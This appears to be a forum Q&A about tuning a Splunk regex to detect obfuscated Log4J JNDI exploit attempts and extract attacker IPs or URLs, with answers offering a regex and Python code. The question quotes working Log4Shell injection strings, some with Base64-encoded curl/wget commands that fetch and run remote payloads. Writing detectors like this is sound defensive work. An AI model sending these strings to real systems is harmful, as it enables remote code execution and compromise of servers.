Please help me improve this Log4J Regex that pulls out possible Malicious Sources

Question

I'm trying to use this regex to pull malicious IPs or URLs out of Log4J exploit attempts in Splunk, a SIEM (Security Information and Event Management) platform. The problem is that I'm running into Splunk's regex limits. I've already tried to optimize the pattern in regex101.

This regex works well so far, but I'm running out of memory in Splunk.

Regex Step Count: ~2000

Requirements of the regex:

- detects obfuscated Log4J exploit attempts
- pulls out the malicious IP or URL that the attacker wants to be queried

Regex used so far
`(\$\|%24)(\{\|%7B)([^jJ][jJ])([^nN][nN])([^dD][dD])([^iI][iI])(:\|%3A\|\$\|%24\|}\|%7D)(?<Exploit>.?)((\:\|%3A)?)(\/\/\|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.?)))\|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]?)\|(%24)\|(%7B)\|(%7D))?[\w\d\.]+?[\.\/\:\=]?)+))((%7D\|\}){1})`

Examples of Log4J exploit strings
`${jndi:ldap://${hostName}.c6qgldh5g22l07bu1lvgcg4ukyyygg3tw.example.com/a}`
`$%7Bjndi:ldap://161.104.129.3:1389/Exploit%7D`
`${jndi:ldaps://probe001.log4j.example.net:9200/b}`
`${jndi:ldap://161.104.129.3:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC4yMTUuNDguMTA2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC4yMTUuNDguMTA2OjQ0Myl8YmFzaA==}`
`$%7Bjndi:ldap://$%7BhostName%7D_solr.c78v36tibg0r9p1hgukgc8e9jaaydcyag.ns1.exploitexample.com%7D`
`%24%7B%24%7B%3A%3Aj%7Dndi%3Armi%3A%2F%2F161.104.129.3%3A1389%2FBinary%7D`
`${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://161.104.129.3:1389/Binary}`
`${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//161.104.129.3:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}`

Hoping to learn from the regex masters or anyone who has input on this :)

score 1 · Answer 1 · answered Jan 07 '22 at 16:04

Based on the samples you provided, this regex seems to match what you're looking for:

`([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)`

Check out regex101's "EXPLANATION" box for a breakdown of what it does.
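
If you want to try the pattern outside regex101, here is a small sketch in Python. Python's `re` module spells named groups `(?P<name>...)`, so that part is rewritten; everything else is the pattern as posted. The `BENIGN` string is a made-up line of mine, not something from your logs. It is there to show one caveat: a bracket expression like `[\%24]` matches any single one of `%`, `2` or `4`, not the literal text `%24`, so the pattern is quite permissive.

```python
import re

# Same pattern as above, with (?<name>...) rewritten as (?P<name>...) for Python.
PATTERN = re.compile(
    r"([\$]|[\%24]){1,3}(?P<suspicious_log4j>([\{]|[\%7B]{1,3})"
    r".*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)"
)

# Six of the samples from the question (the two long Base64 ones are left out).
SAMPLES = [
    "${jndi:ldap://${hostName}.c6qgldh5g22l07bu1lvgcg4ukyyygg3tw.example.com/a}",
    "$%7Bjndi:ldap://161.104.129.3:1389/Exploit%7D",
    "${jndi:ldaps://probe001.log4j.example.net:9200/b}",
    "$%7Bjndi:ldap://$%7BhostName%7D_solr.c78v36tibg0r9p1hgukgc8e9jaaydcyag.ns1.exploitexample.com%7D",
    "%24%7B%24%7B%3A%3Aj%7Dndi%3Armi%3A%2F%2F161.104.129.3%3A1389%2FBinary%7D",
    "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://161.104.129.3:1389/Binary}",
]

# Hypothetical harmless log line, used only to show how loose the classes are.
BENIGN = "order 47 shipped in 2 days"

for line in SAMPLES + [BENIGN]:
    # Print whether the pattern finds a match anywhere in the line.
    print(bool(PATTERN.search(line)), line)
```

Every line prints `True`, including the harmless one, so expect false positives if you alert on this pattern alone.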

Against your samples it returns 8 matches in 686 steps, versus the ~2000 steps you reported for your original.
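
Since the step count is the bottleneck, another option is to undo the obfuscation before matching, so the final pattern can stay small. Below is a minimal sketch in Python (not SPL), under assumptions of mine: the helper names `normalize` and `malicious_source` are hypothetical, nested lookups are collapsed with a simple heuristic (keep the text after `:-`, otherwise the text after the last `:`), and a lookup that cannot be resolved, such as `${hostName}`, is replaced by its bare name. It only undoes one layer of percent-encoding.

```python
import ipaddress
import re
from urllib.parse import unquote

# Innermost lookup: "${...}" with no "$", "{" or "}" inside.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Small pattern for the host once the text is plain. The optional "}" and ":"
# tolerate the early closing brace seen in one of the samples.
SOURCE = re.compile(r"\$\{jndi:\w+\}?:?//([^/:}\s]+)", re.IGNORECASE)


def _resolve(match):
    """Heuristically replace one inner lookup with the text it likely yields."""
    body = match.group(1)
    if body.lower().startswith("jndi"):
        return match.group(0)            # keep the outer jndi lookup intact
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${env:NaN:-j} -> j
    return body.rpartition(":")[2]       # ${lower:j} -> j, ${hostName} -> hostName


def normalize(raw):
    """Percent-decode once, then collapse inner lookups until nothing changes."""
    text = unquote(raw)
    while True:
        collapsed = LOOKUP.sub(_resolve, text)
        if collapsed == text:
            return text
        text = collapsed


def malicious_source(raw):
    """Return ("ip", host) or ("url", host), or None when no jndi target is found."""
    found = SOURCE.search(normalize(raw))
    if found is None:
        return None
    host = found.group(1)
    try:
        ipaddress.ip_address(host)
        return ("ip", host)
    except ValueError:
        return ("url", host)


if __name__ == "__main__":
    for sample in (
        "$%7Bjndi:ldap://161.104.129.3:1389/Exploit%7D",
        "${jndi:ldaps://probe001.log4j.example.net:9200/b}",
        "%24%7B%24%7B%3A%3Aj%7Dndi%3Armi%3A%2F%2F161.104.129.3%3A1389%2FBinary%7D",
    ):
        print(malicious_source(sample))
```

For the URL-encoded sample `$%7Bjndi:ldap://161.104.129.3:1389/Exploit%7D` this returns `("ip", "161.104.129.3")`. The decoding and lookup-collapsing steps would still have to be ported to whatever your Splunk search can do before the extraction; that part is not shown here.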
